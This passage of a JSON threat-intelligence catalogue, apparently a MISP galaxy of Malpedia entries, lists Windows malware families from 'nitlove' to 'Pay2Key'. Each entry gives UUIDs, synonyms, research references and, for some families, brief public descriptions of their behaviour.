"refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove", "https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html" ], "synonyms": [], "type": [] }, "uuid": "1bdd56fe-beca-4652-af39-87b5e45ae130", "value": "nitlove" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol", "https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/", "https://en.wikipedia.org/wiki/Nitol_botnet", "https://krebsonsecurity.com/tag/nitol/" ], "synonyms": [], "type": [] }, "uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5", "value": "Nitol" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nixscare", "https://twitter.com/3xp0rtblog/status/1302584919592501248" ], "synonyms": [], "type": [] }, "uuid": "a49d1134-f4d9-4778-bbd4-c70655be9cf6", "value": "NixScare Stealer" }, { "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat", "https://asec.ahnlab.com/1369", "https://github.com/itsKindred/malware-analysis-writeups/blob/master/bashar-bachir-chain/bashar-bachir-analysis.pdf", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks", "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/", "https://www.4hou.com/posts/VoPM", "https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware", "https://blogs.360.cn/post/APT-C-44.html", "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", "https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control", "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://news.sophos.com/en-us/2020/05/14/raticate/", "https://securelist.com/apt-trends-report-q2-2019/91897/", "http://blogs.360.cn/post/analysis-of-apt-c-37.html", "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", "https://www.trendmicro.com/en_us/research/20/i/wind-up-windscribe-vpn-bundled-with-backdoor.html", "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.njRAT", "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "https://ti.360.net/blog/articles/analysis-of-apt-c-27/", "https://blog.reversinglabs.com/blog/rats-in-the-library" ], "synonyms": [ "Bladabindi" ], "type": [] }, "uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b", "value": "NjRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer", "https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap" ], "synonyms": [], "type": [] }, "uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a", "value": "Nocturnal Stealer" }, { "description": "Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" ], "synonyms": [], "type": [] }, "uuid": "f3cbe9ca-e65e-41af-8eb2-1e9877434124", "value": "Nokki" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor" ], "synonyms": [], "type": [] }, "uuid": "6207668d-af17-44a6-97a2-e1b448264529", "value": "Nozelesn (Decryptor)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom", "https://twitter.com/malwrhunterteam/status/910952333084971008", "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin", "https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/" ], "synonyms": [], "type": [] }, "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de", "value": "nRansom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.numando", "https://www.welivesecurity.com/2020/10/01/latam-financial-cybercrime-competitors-crime-sharing-ttps/" ], "synonyms": [], "type": [] }, "uuid": "69d63487-6200-4f71-845e-df3997402b00", "value": "Numando" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nvisospit", "http://www.isg.rhul.ac.uk/dl/weekendconference2014/slides/Erik_VanBuggenhout.pdf", "https://twitter.com/Bank_Security/status/1134850646413385728", "https://twitter.com/r3c0nst/status/1135606944427905025" ], "synonyms": [], "type": [] }, "uuid": "83cfa206-b485-47fd-b298-1b008ab86507", "value": "NVISOSPIT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim", "https://www.cert.pl/en/news/single/nymaim-revisited/", "https://www.shadowserver.org/news/goznym-indictments-action-following-on-from-successful-avalanche-operations/", "https://www.justice.gov/opa/pr/goznym-cyber-criminal-network-operating-out-europe-targeting-american-entities-dismantled", "https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded", "https://securityintelligence.com/posts/goznym-closure-comes-in-the-shape-of-a-europol-and-doj-arrest-operation/", "https://bitbucket.org/daniel_plohmann/idapatchwork", "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/", "https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0", "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf", "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim", "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", "https://www.lawfareblog.com/what-point-these-nation-state-indictments" ], "synonyms": [ "nymain" ], "type": [] }, "uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937", "value": "Nymaim" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2", "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/" ], "synonyms": [], "type": [] }, "uuid": "c8e8392f-883e-412e-9b0b-02137d0875da", "value": "Nymaim2" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oblique_rat", "https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://securelist.com/transparent-tribe-part-2/98233/", "https://www.secrss.com/articles/24995", "https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" ], "synonyms": [], "type": [] }, "uuid": "33c138a0-85d3-4497-90e9-ada1d501a100", "value": "Oblique RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.obscene", "https://habr.com/ru/post/27053/", "https://sysopfb.github.io/malware/2020/02/28/Golang-Wrapper-on-an-old-malware.html" ], "synonyms": [], "type": [] }, "uuid": "8f623a37-80a4-4240-9586-6ea7a2a97e30", "value": "Obscene" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oceansalt", "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf" ], "synonyms": [], "type": [] }, "uuid": "01cef4e7-a8a8-4b42-b509-f91c5d415354", "value": "Oceansalt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.octopus", "https://securelist.com/octopus-infested-seas-of-central-asia/88200/", "https://mp.weixin.qq.com/s/v1gi0bW79Ta644Dqer4qkw", "https://isc.sans.edu/diary/26918" ], "synonyms": [], "type": [] }, "uuid": "777b76f9-5390-4899-b201-ebaa8a329c96", "value": "Octopus (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob" ], "synonyms": [], "type": [] }, "uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2", "value": "OddJob" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" ], "synonyms": [], "type": [] }, "uuid": "045df65f-77fe-4880-af34-62ca33936c6e", "value": "Odinaff" }, { "description": "a new, previously unknown backdoor that we named Okrum. The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.okrum", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/", "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/" ], "synonyms": [], "type": [] }, "uuid": "af2e4e0d-e8ae-48a9-aac4-2a49242c68d2", "value": "Okrum" }, { "description": "According to FireEye, OLDBAIT is a credential stealer that has been observed to be used by APT28.\r\nIt targets Internet Explorer, Mozilla Firefox, Eudora, The Bat! (an email client by a Moldovan company), and Becky! (an email client made by a Japanese company). It can use both HTTP or SMTP to exfiltrate data.\r\nIn some places it is mistakenly named \"Sasfis\", which however seems to be a completely different and unrelated malware family.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait", "https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "https://www.secjuice.com/fancy-bear-review/" ], "synonyms": [ "Sasfis" ], "type": [] }, "uuid": "b79a6b61-f122-4823-a4ab-bbab89fcaf75", "value": "OLDBAIT" }, { "description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer", "https://www.youtube.com/watch?v=a4BZ3SZN-CI", "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/", "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/", "https://www.youtube.com/watch?v=1jgdMY12mI8", "https://securelist.com/the-devils-in-the-rich-header/84348/", "https://www.youtube.com/watch?v=wCv9SiSA7Sw", "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/", "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", "https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/", "https://securelist.com/olympic-destroyer-is-still-alive/86169/", "https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights", "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://www.wired.com/story/untold-story-2018-olympics-destroyer-cyberattack/", "https://www.mbsd.jp/blog/20180215.html", "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" ], "synonyms": [ "SOURGRAPE" ], "type": [] }, "uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28", "value": "Olympic Destroyer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat", "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview", "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" ], "synonyms": [], "type": [] }, "uuid": "82733125-da67-44ff-b2ac-b16226088211", "value": "ONHAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oni", "https://www.bleepingcomputer.com/news/security/oni-ransomware-used-in-month-long-attacks-against-japanese-companies/" ], "synonyms": [], "type": [] }, "uuid": "c182f370-4721-4968-a3b1-a7e96ab876df", "value": "Oni Ransomware" }, { "description": "OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke", "https://blog.f-secure.com/podcast-dukes-apt29/", "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", "https://www.secureworks.com/research/threat-profiles/iron-hemlock", "https://www.f-secure.com/weblog/archives/00002764.html", "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html" ], "synonyms": [], "type": [] }, "uuid": "abd10caa-7d4c-4c22-8dae-8d32f13232d7", "value": "OnionDuke" }, { "description": "A spambot that has been observed being used for spreading Ursnif, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner", "https://www.blueliv.com/blog/research/analysis-spam-distribution-botnet-onliner-spambot/", "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html", "https://benkowlab.blogspot.com/2017/08/from-onliner-spambot-to-millions-of.html" ], "synonyms": [ "Onliner", "SBot" ], "type": [] }, "uuid": "6cf05dad-86c8-4f46-b5b8-0a004360563f", "value": "OnlinerSpambot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie", "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/" ], "synonyms": [], "type": [] }, "uuid": "d07c3def-91af-4d9b-bdf7-62c9e0b44968", "value": "OopsIE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki", "https://forum.malekal.com/viewtopic.php?t=21806", "https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519", "http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html", "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html" ], "synonyms": [], "type": [] }, "uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7", "value": "Opachki" }, { "description": "This entry serves as a placeholder of malware observed during Operation Ghoul. The samples will likely be assigned to their respective families. Some families involved and identified were Alina POS (Katrina variant) and TreasureHunter POS.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul", "https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/" ], "synonyms": [], "type": [] }, "uuid": "25a280b2-0260-4593-bf8c-7062dfdc6c38", "value": "OpGhoul" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/" ], "synonyms": [], "type": [] }, "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d", "value": "OpBlockBuster" }, { "description": "FireEye details ORANGEADE as a dropper for the CREAMSICLE malware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orangeade", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "092262b0-c631-400d-9f38-017cd59a14fd", "value": "ORANGEADE" }, { "description": "OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat", "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html", "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood" ], "synonyms": [], "type": [] }, "uuid": "08103f1c-f83d-4037-a1ae-109b06f79226", "value": "OrcaRAT" }, { "description": "Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html", "https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/", "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors", "https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html", "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", "https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/", "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/" ], "synonyms": [ "Schnorchel" ], "type": [] }, "uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61", "value": "Orcus RAT" }, { "description": "This malware claims to be a ransomware, but it's actually a wiper. After execution, this malware terminates a number of processes such as database processes, likely to allow access to any files that these programs may have held open. Ordinypt will avoid wiping certain files and folders in order to prevent the infected machine from becoming unusable. Affected files are overwritten with null character and receive a random 5 character file extension. Finally, shadow copies are removed and Windows startup repair is disabled to complicate recovery of data from the affected system. The desktop background is changed and a ransom note is dropped for the victim. A C2 check-in occurs to keep track of the file extension used on that specific machine, as well as which BitCoin address was randomly provided for payment to the victim (drawn from a long list stored in the ransomware configuration). ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt", "https://dissectingmalwa.re/tfw-ransomware-is-only-your-side-hustle.html", "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/", "https://www.gdata.de/blog/2017/11/30151-ordinypt", "https://www.carbonblack.com/2019/09/05/cb-threat-analysis-unit-technical-breakdown-germanwiper-ransomware/" ], "synonyms": [ "GermanWiper", "HSDFSDCrypt" ], "type": [] }, "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", "value": "Ordinypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oski", "https://labs.bitdefender.com/2020/03/new-router-dns-hijacking-attacks-abuse-bitbucket-to-host-infostealer/", "https://www.cyberark.com/resources/threat-research-blog/meet-oski-stealer-an-in-depth-analysis-of-the-popular-credential-stealer", "https://twitter.com/albertzsigovits/status/1160874557454131200" ], "synonyms": [], "type": [] }, "uuid": "414d8e68-77e7-4157-936a-d70d80e5efc0", "value": "Oski Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.osno", "https://www.gdatasoftware.com/blog/2020/11/36459-babax-stealer-rebrands-to-osno-installs-rootkit" ], "synonyms": [ "Babax" ], "type": [] }, "uuid": "e2be4da9-0a8f-45a5-a69b-7f16acb39398", "value": "Osno" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.outcrypt", "https://id-ransomware.blogspot.com/2020/07/outcrypt-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "90e5a21a-c058-47a0-aa4d-bffde7ba698e", "value": "OutCrypt Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor", "https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf", "https://twitter.com/VK_Intel/status/1085820673811992576", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" ], "synonyms": [ "FACADE" ], "type": [] }, "uuid": "10a521e4-b3b9-4feb-afce-081531063e7b", "value": "Outlook Backdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.overlay_rat", "https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/", "https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking" ], "synonyms": [], "type": [] }, "uuid": "842687f5-91bc-4719-ac3f-4166ae02e0cd", "value": "Overlay RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ovidiystealer", "https://www.proofpoint.com/us/threat-insight/post/meet-ovidiy-stealer-bringing-credential-theft-masses" ], "synonyms": [], "type": [] }, "uuid": "30d49b12-0dca-4652-9f7a-4d0cf7555375", "value": "OvidiyStealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth", "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/", "https://www.secureworks.com/research/threat-profiles/bronze-union" ], "synonyms": [ "luckyowa" ], "type": [] }, "uuid": "37f66fcc-e093-4d97-902d-c96602a7d234", "value": "owaauth" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.owlproxy", "https://medium.com/cycraft/taiwan-government-targeted-by-multiple-cyberattacks-in-april-2020-3b20cea1dc20" ], "synonyms": [], "type": [] }, "uuid": "7a6d97a2-821f-4083-9180-3f70a851ad5e", "value": "Owlproxy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ozh_rat", "https://twitter.com/BushidoToken/status/1266075992679948289" ], "synonyms": [], "type": [] }, "uuid": "c9eefa23-4881-490f-abff-c78fe0c165ff", "value": "OZH RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ozone", "https://www.fortinet.com/blog/threat-research/german-speakers-targeted-by-spam-leading-to-ozone-rat.html" ], "synonyms": [], "type": [] }, "uuid": "4e319700-9350-4656-91f5-0b495af4e8ad", "value": "Ozone RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.padcrypt", "https://johannesbader.ch/2016/03/the-dga-of-padcrypt/", "https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/" ], "synonyms": [], "type": [] }, "uuid": "c21335f5-b145-4029-b1bc-161362c7ce80", "value": "PadCrypt" }, { "description": "Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin", "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" ], "synonyms": [], "type": [] }, "uuid": "c6728a76-f4d9-4c49-a3aa-be895df13a35", "value": "paladin" }, { "description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.\r\n\r\nPanda does have some DGA implemented, but according to Arbor, a bug prevents it from using it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker", "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker", "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/", "https://www.youtube.com/watch?v=J7VOfAJvxEY", "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers", "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/", "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media", "https://www.spamhaus.org/news/article/771/", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf", "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html", "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/" ], "synonyms": [ "ZeusPanda" ], "type": [] }, "uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303", "value": "PandaBanker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.paradise", "https://www.acronis.com/en-us/blog/posts/paradise-ransomware-strikes-again", "https://www.lastline.com/labsblog/iqy-files-and-paradise-ransomware/", "https://labs.bitdefender.com/2020/01/paradise-ransomware-decryption-tool", "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/" ], "synonyms": [], "type": [] }, "uuid": "4f7e7602-79f8-4eea-8239-fb2d4ceadb9f", "value": "Paradise Ransomware" }, { "description": "Parallax is a Remote Access Trojan used by attackers to gain access to a victim's machine. It was involved in one of the many infamous \"coronamalware\" campaigns. Basically, the attackers abused the COVID-19 pandemic news to lure victims into opening themed emails spreading parallax.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax", "https://www.vkremez.com/2020/02/lets-learn-inside-parallax-rat-malware.html", "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html", "https://blog.morphisec.com/parallax-rat-active-status", "https://www.bleepingcomputer.com/news/security/parallax-rat-common-malware-payload-after-hacker-forums-promotion/", "https://twitter.com/malwrhunterteam/status/1227196799997431809" ], "synonyms": [ "ParallaxRAT" ], "type": [] }, "uuid": "39f74f33-467e-47a4-bd2f-e0a191dee9ca", "value": "Parallax RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http", "https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks" ], "synonyms": [], "type": [] }, "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf", "value": "parasite_http" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.passlock", "https://id-ransomware.blogspot.com" ], "synonyms": [], "type": [] }, "uuid": "1e78c732-c2f0-4178-a1f5-ccdab0e2d4b8", "value": "Passlock Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pay2key", "https://research.checkpoint.com/2020/ransomware-alert-pay2key/", "https://www.bleepingcomputer.com/news/security/intels-habana-labs-hacked-by-pay2key-ransomware-data-stolen/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf" ], "synonyms": [ "Cobalt" ], "type": [] }, "uuid": "46dc64c6-e927-44fc-b4a4-efd1677ae030", "value": "Pay2Key" }, { "description": "", "meta": { "refs": [ 